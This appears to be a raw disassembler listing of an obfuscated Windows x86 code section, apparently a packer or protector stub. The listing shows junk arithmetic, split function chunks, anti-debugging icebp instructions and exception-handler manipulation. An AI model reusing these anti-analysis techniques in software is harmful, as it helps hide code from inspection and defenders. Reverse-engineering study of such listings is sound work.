xor ebx, 0E370313Bh
jmp loc_48D037
; ---------------------------------------------------------------------------
db 0C1h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2, 81h, 0C3h
dd 0E7F7CFDFh, 0F5BC30Ch, 244784h, 0F88B5700h, 0E9243C87h
dd 0FFFFE6C2h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48A086 proc near ; CODE XREF: znnrn47v:00488659j
; znnrn47v:0048AA4Dp
xchg ebx, [esp+0]
pop ebx
add eax, 67C20CC0h
popf
dec ecx
add al, 24h
jmp sub_48A71A
sub_48A086 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
jmp loc_488471
; ---------------------------------------------------------------------------
align 10h
jmp loc_488ABC
; ---------------------------------------------------------------------------
jmp loc_48AA39
; ---------------------------------------------------------------------------
jmp loc_48ABCF
; ---------------------------------------------------------------------------
align 10h
dd 4E830F00h, 57000025h, 0B1A45368h, 241C87C7h, 14E9FB8Bh
; CODE XREF: sub_48C14F:loc_48C02Dj
dd 0FFFFFBh, 2414875Bh, 0F18B565Ah, 0FFF40EE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
locret_48A0D6: ; CODE XREF: znnrn47v:loc_48CEACj
retn
; ---------------------------------------------------------------------------
byte_48A0D7 db 52h ; DATA XREF: sub_48A541-21Fo
dd 0B4CE8h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48A0DE proc near ; CODE XREF: sub_488F9C:loc_4892FCp
; FUNCTION CHUNK AT 0048CF8C SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push esi
mov esi, offset loc_489CC7
jmp loc_48CF8C
sub_48A0DE endp
; ---------------------------------------------------------------------------
db 0Fh, 87h, 5Fh
dd 0E9FFFFE4h, 0FFFFDD65h, 50590000h, 0E18868F8h, 97E86D09h
dd 4, 0F84AE900h, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_574. PRESS KEYPAD "+" TO EXPAND]
align 2
call ds:dword_45B0C0 ; ExitProcess
push 487CDAh
jmp loc_48CFF4
; ---------------------------------------------------------------------------
loc_48A122: ; CODE XREF: znnrn47v:0048C704j
popf
push offset loc_48AC3E
jmp loc_48B59C
; ---------------------------------------------------------------------------
align 2
rol eax, 0Dh
; START OF FUNCTION CHUNK FOR sub_487D6E
loc_48A131: ; CODE XREF: sub_487D6E+4j
sub eax, 0E0432E14h
add eax, 0A5456A8Ah
xchg eax, [esp-4+arg_0]
jmp loc_48A7E7
; END OF FUNCTION CHUNK FOR sub_487D6E
; ---------------------------------------------------------------------------
db 2 dup(0), 8Dh
dd 488BBA05h, 0FB9BE800h, 0FFFFh
; ---------------------------------------------------------------------------
loc_48A154: ; CODE XREF: znnrn47v:00487E70j
add esp, 4
push offset loc_48C27C
jmp loc_48A446
; ---------------------------------------------------------------------------
align 2
dw 1C6h
dd 68575903h, 6839C9ACh, 0CDC7815Fh, 0E9AA34F1h, 0FFFFE213h
dd 3AC1F700h, 0E9D25665h, 0A56h, 89E8098Bh, 13h
; ---------------------------------------------------------------------------
loc_48A18C: ; CODE XREF: znnrn47v:00488D7Ej
xchg edi, [esp]
pop edi
add eax, ecx
pop ecx
xchg eax, [esp]
call sub_489135
add dh, al ; CODE XREF: sub_48B41C+CF2j
add eax, [edi-74DBD379h]
fstp qword ptr [ebp-75h]
icebp
xchg esi, [esp]
jmp loc_48B5DF
; ---------------------------------------------------------------------------
rol esi, 8
jmp loc_48ABFD
; ---------------------------------------------------------------------------
align 4
dd 0BE68C300h, 5F869C6Eh, 313FEF81h, 0C781233Ch, 219EC86Bh
dd 0ADF9CF81h, 0FB684140h, 0E900488Fh, 0FFFFFE1Ch, 87DD0300h
dd 2C872414h, 0E9D58B24h, 2295h, 90E99D00h, 11h, 0F3F08100h
dd 50C29893h, 8EEA689Ch, 0D158AE44h, 0E5CAE9C0h, 0C100FFFFh
dd 0C3C11DEFh, 0D969E905h, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48A218: ; CODE XREF: sub_489135+960j
shr ebx, 1Bh
test eax, 0A5D7241Ah
jmp loc_48C5EC
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48A227: ; CODE XREF: sub_489135+C7Aj
jnz loc_48ADDE
jmp loc_48C9B7
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
xor ecx, eax
; =============== S U B R O U T I N E =======================================
sub_48A234 proc near
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0048A56E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C869 SIZE 00000019 BYTES
xchg edi, [esp+0]
pop edi
push 0D1277C95h
jmp loc_48C869
sub_48A234 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
align 2
dw 0E6E9h
dd 0FFFFF0h, 0FA43C00h, 685h, 2605E900h, 68000000h, 48B62Ah
dd 0FFDD97E9h, 810000FFh, 64C85BCEh, 0F5C68137h, 8B88D0C0h
dd 0CE689C36h, 596C33A2h, 9904E981h, 0C1818CF9h, 210EA776h
dd 0FFDD60E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_48A28E proc near ; CODE XREF: sub_48C14F-3C44p
; FUNCTION CHUNK AT 0048CA66 SIZE 00000005 BYTES
xchg ebx, [esp+0]
xchg ecx, [esp+0]
mov ebx, ecx
pop ecx
add edi, ebp
push offset unk_4884CD
jmp loc_48CA66
sub_48A28E endp
; ---------------------------------------------------------------------------
align 4
dd 0E900C300h, 1A54h, 878707C6h, 0FE8B2434h, 0A916685Eh
; CODE XREF: znnrn47v:0048B68Dj
dd 0E95877E4h, 26D8h, 0C015FF00h, 6A0045B0h, 0C015FFFFh
dd 510045B0h, 0FFF960E9h, 566856FFh, 87C02300h, 0F08B2404h
dd 48F68158h, 814DA42Bh, 598932FEh, 0F230E9B2h, 890FFFFFh
dd 1959h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48A2F8: ; CODE XREF: sub_48B1BE-2263j
sub eax, 0F695FC1Ch
add eax, 8D8F7063h
xchg eax, [esp+4+var_4]
jmp nullsub_595
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
dd 0EF7CE800h, 0E900FFFFh, 1C77h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A541
loc_48A31A: ; CODE XREF: sub_48A541:loc_4887B8j
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+0]
push offset byte_48A0D7
jmp loc_48BAFD
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
mov ebx, 489B80h
jmp loc_48A8A2
; ---------------------------------------------------------------------------
align 4
mov edx, 48A070h
jmp loc_48BEDF
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_48A347: ; CODE XREF: sub_489582+34CCj
jmp loc_489FB2
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
dd 112FE900h, 92680000h, 508DDCC9h, 48A5AFB8h, 0F114E900h
; CODE XREF: sub_48C14F:loc_48C16Aj
dd 0FFFFh, 4F24F681h, 0C6812ED2h, 442DE674h, 978E9h, 0E9F91B00h
dd 115Ah, 0E9DF1300h, 0FFFFE217h
db 0
; ---------------------------------------------------------------------------
locret_48A385: ; CODE XREF: znnrn47v:loc_48B26Bj
retn
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFDAA9h, 3C870000h, 0C4835F24h
db 4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48A395: ; CODE XREF: sub_48A5BC+6Fj
push 96BF52C5h
pop eax
and eax, 0F1ED02F5h
jmp loc_48C774
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48A3A7: ; CODE XREF: sub_48C14F:loc_48C222p
xchg edx, [esp]
pop edx
xchg ebp, [esp]
call sub_48AE05
; ---------------------------------------------------------------------------
db 0
dd 1A3CE900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48A3BA: ; CODE XREF: znnrn47v:0048BCA1j
jnb loc_4898FA
loc_48A3C0: ; CODE XREF: znnrn47v:00488CDAj
add edi, 8CC8AD12h
loc_48A3C6: ; DATA XREF: znnrn47v:0048ADFCo
insb
call sub_4893DD
; START OF FUNCTION CHUNK FOR sub_48C93E
loc_48A3CC: ; CODE XREF: sub_48C93E+7j
jmp loc_48BCB1
; END OF FUNCTION CHUNK FOR sub_48C93E
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_48A3D2 proc near ; DATA XREF: sub_48C14F:loc_48A4A4o
; FUNCTION CHUNK AT 0048996D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CBB9 SIZE 00000018 BYTES
call sub_48AC88
add [edi+685B241Ch], al
and ch, [ecx+65h]
push ebp
loc_48A3E1: ; CODE XREF: znnrn47v:004887BEj
pop eax
or eax, 0EAA39C22h
jmp loc_48996D
sub_48A3D2 endp
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h
dd 2B680000h, 0F7C47C1Ah, 0EFDFE9D7h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48A3FF: ; CODE XREF: sub_488955:loc_4893FFj
pop eax
or eax, 19600BC1h
jns loc_48C2FF
sub ebx, 31C6DBC8h
sbb ecx, esi
or edx, ebx
jmp loc_48C2FF
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
align 2
loc_48A41E: ; CODE XREF: znnrn47v:0048B7BAj
jmp loc_48CCAD
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_573. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B6E8
loc_48A425: ; CODE XREF: sub_48B6E8+12j
jmp loc_48A809
; END OF FUNCTION CHUNK FOR sub_48B6E8
; ---------------------------------------------------------------------------
align 4
dd 0FFEBF5E8h, 0F5BCE8FFh, 6857FFFFh, 514CCC76h, 0DBFE95Fh
dd 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
loc_48A446: ; CODE XREF: znnrn47v:0048A15Cj
jmp locret_48AA62
; ---------------------------------------------------------------------------
loc_48A44B: ; CODE XREF: znnrn47v:004883BDj
jmp loc_48AF0D
; ---------------------------------------------------------------------------
mov byte ptr [eax], 8Bh
pop eax
rol ecx, 18h
or ecx, 8F165D1Dh
sub ecx, 0E0D4C270h
jmp loc_48B03C
; ---------------------------------------------------------------------------
dd 4AE58100h, 0E9900707h, 10A0h, 0D5030000h, 0C98BC281h
dd 9D685968h, 0E9004881h, 0FFFFE60Dh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48A488: ; CODE XREF: sub_48C14F:loc_4899D5j
; sub_48C14F-2764j
or edi, 0ED268C7Ah
add edi, 8FC1BC8Dh
add edi, ebp
add edi, 82CE95F4h
mov [edi], eax
pop edi
call sub_48942C
loc_48A4A4: ; CODE XREF: znnrn47v:0048BEA9j
push offset sub_48A3D2
jmp nullsub_585
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 10h
or ecx, edi
loc_48A4B2: ; CODE XREF: znnrn47v:0048A949j
jmp sub_48961B
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48A4B9: ; CODE XREF: znnrn47v:00488EF4j
jnz loc_48828C
pop ebx
not ebp
add ecx, 0E55002CCh
test ecx, 0F39CFCC7h
jmp loc_488286
; ---------------------------------------------------------------------------
align 4
dd 0C300h, 0FFDB68E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48A4DD: ; CODE XREF: sub_48B1BE+5j
jmp loc_48BDB6
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFFC2Ah, 8700C600h, 8B241C87h, 8B505BC3h, 240487C7h
dd 0DCB2E956h
db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_578. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48A4FF: ; CODE XREF: sub_488955+4591j
jmp loc_48C63F
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_48A505 proc near ; CODE XREF: sub_489F66p
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg edx, [esp-4+arg_0]
pop edx
jmp near ptr dword_488AC8+9Ah
sub_48A505 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
push ecx
mov ecx, offset loc_4887A6
jmp loc_48962E
; ---------------------------------------------------------------------------
db 8Bh
dd 0F5F0E82Ah, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48A528: ; CODE XREF: sub_48D039-4D8Ej
jmp loc_48B3B6
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
db 81h, 0C2h, 90h
dd 0A021AC34h, 3F6857D5h, 5F15D691h, 0FFFD05E9h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_48A541 proc near ; CODE XREF: sub_488955+2655p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004887B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004895DB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00489DDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A31A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048BAFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BF08 SIZE 00000013 BYTES
xchg edi, [esp+0]
pop edi
push ebx
mov ebx, offset loc_48BF13
jmp loc_4895DB
sub_48A541 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 4870000h, 24348724h, 685EC68Bh, 0C9866EF4h, 0FFDB0DE9h
dd 0E80000FFh, 0B21h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A234
loc_48A56E: ; CODE XREF: sub_48A234+2649j
jmp sub_48A71A
; END OF FUNCTION CHUNK FOR sub_48A234
; ---------------------------------------------------------------------------
jg loc_48AFDF
jmp loc_48C829
; ---------------------------------------------------------------------------
loc_48A57E: ; DATA XREF: znnrn47v:0048870Co
jmp loc_48BB76
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFE9E9h, 0FFF90EE8h, 0E90000FFh, 1A37h
; CODE XREF: znnrn47v:loc_48C7F2j
db 0
; ---------------------------------------------------------------------------
locret_48A595: ; CODE XREF: znnrn47v:0048809Bj
retn
; ---------------------------------------------------------------------------
dw 0E900h
dd 7DAh, 0C87F213h, 1C875924h, 5BC38B24h, 12FE9h, 87000000h
dd 9C68242Ch, 0E9004898h, 0FFFFF2DEh
; =============== S U B R O U T I N E =======================================
sub_48A5BC proc near ; DATA XREF: sub_488D12+27A5o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0048855A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489413 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004895C5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00489692 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489913 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489F49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A395 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A776 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A857 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A9F7 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0048AAC6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048B167 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048BB76 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BE5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C774 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CC8E SIZE 00000005 BYTES
push ebx
mov ebx, eax
xchg ebx, [esp+8+var_8]
push 689F6FF4h
pop eax
jmp loc_48A6C3
; ---------------------------------------------------------------------------
loc_48A5CD: ; CODE XREF: znnrn47v:00489160j
mov edx, 0C4C54F11h
jmp loc_4895C5
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48A5D9: ; CODE XREF: sub_48920C:loc_48AFB1j
mov byte ptr [eax], 57h
xchg ebp, [esp+8+var_8]
loc_48A5DF: ; CODE XREF: sub_48A5BC+7Fj
mov eax, ebp
pop ebp
mov edx, [edx]
loc_48A5E4: ; DATA XREF: sub_48920C-63Fo
inc esi
pushf
call sub_48B9DB
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
locret_48A5ED: ; CODE XREF: znnrn47v:loc_4891D4j
retn
; ---------------------------------------------------------------------------
dw 0E900h
dd 243Fh
db 0
byte_48A5F5 db 3, 0C5h, 81h ; DATA XREF: znnrn47v:loc_489796o
dd 4282A0C0h, 0E51BE8D4h, 0FFFFh, 0E90DE2C1h, 0FFFFE1E0h
db 0
; ---------------------------------------------------------------------------
loc_48A60D: ; CODE XREF: znnrn47v:0048CB5Dj
jz loc_48A857
add ebp, 0A2A585C3h
add eax, ebx
sub edx, 0D3D510CEh
loc_48A621: ; CODE XREF: znnrn47v:loc_48CAC8j
pop large dword ptr fs:0
add esp, 4
jmp loc_48A395
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48A631: ; CODE XREF: sub_488955:loc_48AD3Fj
jge loc_489913
add [eax-26h], ch
cld
loop loc_48A5DF
or eax, 0E5D4DAB6h
shr edi, 0Bh
jmp loc_489913
; ---------------------------------------------------------------------------
align 4
dd 241C8700h, 0FFF9D5E9h, 0E5F0B8FFh, 0C0090043h, 0E69F840Fh
dd 29E9FFFFh, 0FFFFEBh
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_48A669: ; CODE XREF: sub_489645+9j
jmp loc_48AAC6
; ---------------------------------------------------------------------------
align 10h
cdq
mov ecx, ebp
jmp loc_489E2C
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48A67A: ; CODE XREF: sub_4893CC:loc_48B305j
pop edi
xor esi, 0BB1223A1h
db 67h
icebp
push offset dword_48B554
jmp nullsub_587
; ---------------------------------------------------------------------------
align 2
loc_48A68E: ; DATA XREF: znnrn47v:0048B51Bo
call ds:dword_45B0C0 ; ExitProcess
push ecx
mov ecx, edi
xchg ecx, [esp+4+var_4]
push offset unk_48846B
jmp nullsub_611
; ---------------------------------------------------------------------------
dd 0C7810000h, 487E92h, 0E9243C87h, 1ABDh ; CODE XREF: znnrn47v:loc_48AFB8j
db 0
; ---------------------------------------------------------------------------
loc_48A6B5: ; DATA XREF: sub_48C14F-1810o
jnz short $+2
call sub_48B1BE
jmp loc_48C16A
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48A6C3: ; CODE XREF: sub_48A5BC+Cj
and eax, 3289C452h
add eax, 0DFBF524Eh
jmp loc_489F49
sub_48A5BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_602. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48A6D7: ; CODE XREF: sub_489135+3B29j
jmp loc_48C0A0
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
jmp loc_48ACB1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48A6E3: ; CODE XREF: znnrn47v:00488B83j
jmp loc_4898EC
; ---------------------------------------------------------------------------
loc_48A6E8: ; CODE XREF: znnrn47v:loc_488724j
pop ebx
or ebx, 0E685DA9h
xor ebx, 2FBCACBh
cmp edi, ebx
jmp loc_48C19B
; ---------------------------------------------------------------------------
dd 1E7E8h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_48A703: ; CODE XREF: znnrn47v:00489A8Dj
jmp locret_48992A
; ---------------------------------------------------------------------------
dd 0FFF653E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_48A70D: ; DATA XREF: znnrn47v:00489A4Eo
jmp loc_48CB2E
; ---------------------------------------------------------------------------
align 4
jmp loc_48C644
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_48A71A proc near ; CODE XREF: znnrn47v:00488321j
; sub_4893DD:loc_48884Fj ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00488889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488904 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048BC58 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048C0A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE1F SIZE 0000000D BYTES
jz sub_48C14F
push edx
mov edx, ebp
jmp loc_48BC58
sub_48A71A endp
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48A729: ; CODE XREF: sub_48D039+5j
mov edx, ecx
xchg edx, [esp+0]
loc_48A72E: ; DATA XREF: znnrn47v:0048B0D4o
lea eax, dword_487ACC+0E5h
push esi
push 79C5FBFh
pop esi
xor esi, 0B79E1385h
rol esi, 15h
jmp loc_48CE96
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
align 4
loc_48A74C: ; CODE XREF: znnrn47v:00488DE4j
xor esi, 94DADBA9h
and esi, 0ABD723Eh
call sub_48C967
xor ebp, edi
jmp loc_489E9B
; ---------------------------------------------------------------------------
dd 0A4506800h, 0BBE90048h, 0Ch
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_608. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_48A771: ; CODE XREF: znnrn47v:0048B959j
jmp locret_48A7E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48A776: ; CODE XREF: sub_48A5BC-F19j
jmp loc_48855A
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
align 4
dd 5B241C87h, 185FC181h, 96F55D7h, 14BCE8h, 9C000000h
dd 0FFFDBDE8h, 0C30000FFh, 0DA30E900h, 0FFFFh, 21E9F20Bh
dd 0FFFFF9h, 59240C87h, 7659C781h, 3C87F617h, 0FDCEE924h
dd 5100FFFFh, 48AC08B9h, 0E465E900h, 0FFFFh, 1D668F68h
dd 0EA815AF7h, 4AAFACFEh, 57BDF281h, 0C2815663h, 1BA3250Ch
dd 0FFE36AE9h
db 0FFh
; ---------------------------------------------------------------------------
locret_48A7E5: ; CODE XREF: znnrn47v:loc_48A771j
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487D6E
loc_48A7E7: ; CODE XREF: sub_487D6E+23D2j
jmp nullsub_593
; END OF FUNCTION CHUNK FOR sub_487D6E
; ---------------------------------------------------------------------------
dd 8F640000h, 5, 4C4E800h, 50B8h, 1685600h, 0E9E73C12h
dd 2813h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B6E8
loc_48A809: ; CODE XREF: sub_48B6E8:loc_48A425j
mov byte ptr [edi], 0FFh
pop edi
push eax
loc_48A80E: ; DATA XREF: sub_48B6E8+Do
call ds:dword_45B0B4 ; GetModuleHandleA
jmp loc_48B7DD
; END OF FUNCTION CHUNK FOR sub_48B6E8
; ---------------------------------------------------------------------------
db 0C1h, 0E9h, 15h
dd 0FFDEA2E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4896A9
loc_48A823: ; CODE XREF: sub_4896A9-140j
xor eax, 2931CCE9h
or eax, 1353E3DEh
and eax, 0A362B225h
add eax, 0DD01B227h
jmp near ptr dword_487A48+59h
; END OF FUNCTION CHUNK FOR sub_4896A9
; ---------------------------------------------------------------------------
dd 0C30000h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B35E
loc_48A845: ; CODE XREF: sub_48B35E+Fj
; DATA XREF: znnrn47v:0048BEA4o
pop edx
cmp al, 24h
jmp loc_48A850
; END OF FUNCTION CHUNK FOR sub_48B35E
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B35E
loc_48A850: ; CODE XREF: sub_48B35E-B16j
push esi
or esi, 10752A42h
; END OF FUNCTION CHUNK FOR sub_48B35E
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48A857: ; CODE XREF: sub_48A5BC:loc_48A60Dj
jmp loc_48BB76
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_586. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B8DD
loc_48A85F: ; CODE XREF: sub_48B8DD+Cj
jmp near ptr byte_489FF9+2
; END OF FUNCTION CHUNK FOR sub_48B8DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487DC2
loc_48A864: ; CODE XREF: sub_487DC2+1165j
jmp nullsub_570
; END OF FUNCTION CHUNK FOR sub_487DC2
; ---------------------------------------------------------------------------
db 2 dup(0), 0C6h
; ---------------------------------------------------------------------------
push es
xchg ebx, [esi+5Ah]
push ebx
push ebp
jmp loc_48BA8F
; ---------------------------------------------------------------------------
db 68h
dd offset word_48A992
dd 0FFD5CBE9h
db 0FFh
; ---------------------------------------------------------------------------
loc_48A881: ; CODE XREF: znnrn47v:loc_48AB31j
or edi, 331BCA0Ah
xor edi, 0D01D28B1h
or edi, 4C6AE565h
add edi, 10598B89h
jmp loc_48982D
; ---------------------------------------------------------------------------
dw 0C300h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48A8A2: ; CODE XREF: znnrn47v:0048A331j
jmp loc_48B0DF
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_489135
loc_48A8A8: ; CODE XREF: sub_489135+32FDj
pop esi
sub edx, 97244B4Ch
add edx, 3D59E856h
scasb
sar ah, 0E9h
and large ds:0, edx
loc_48A8BF: ; CODE XREF: znnrn47v:0048CF0Dj
push esi
jmp near ptr dword_487ACC+0A9h
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
db 2 dup(0), 0BEh
dd 8C81208h
; ---------------------------------------------------------------------------
loc_48A8CC: ; CODE XREF: znnrn47v:004890FAj
sub edi, 4347AF8Ah
call sub_48C85B
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_48A8D8: ; CODE XREF: znnrn47v:00488A95j
retn
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48A8DA: ; CODE XREF: sub_48C14F-3CC1j
jmp loc_489532
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 10h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_619. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48A8E2: ; CODE XREF: sub_48B1BE+1A2Fj
jnp loc_488385
; END OF FUNCTION CHUNK FOR sub_48B1BE
; =============== S U B R O U T I N E =======================================
sub_48A8E8 proc near
xchg eax, [esp+0]
pop eax
mov byte ptr [edi], 64h
pop edi
push large dword ptr fs:0
mov large fs:0, esp
lock mov eax, large ds:20h
jmp loc_487D84
sub_48A8E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_48A90A: ; CODE XREF: sub_48B1BE:loc_488CA1j
add eax, 520C2DFBh
add eax, ebp
add eax, 0ADF8DA93h
mov eax, [eax]
popf
jmp loc_488F4E
; =============== S U B R O U T I N E =======================================
sub_48A920 proc near ; CODE XREF: znnrn47v:00489E3Bp
; FUNCTION CHUNK AT 0048A9C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BB7C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048CC9A SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
lea eax, dword_487ACC+0E5h
loc_48A92A: ; CODE XREF: sub_48851C+Cj
push edx
push 4D32A590h
pop edx
add edx, 0E2F29158h
jmp loc_48A9C4
sub_48A920 endp
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48A93D: ; CODE XREF: sub_48C14F+D8j
push edi
push ebx
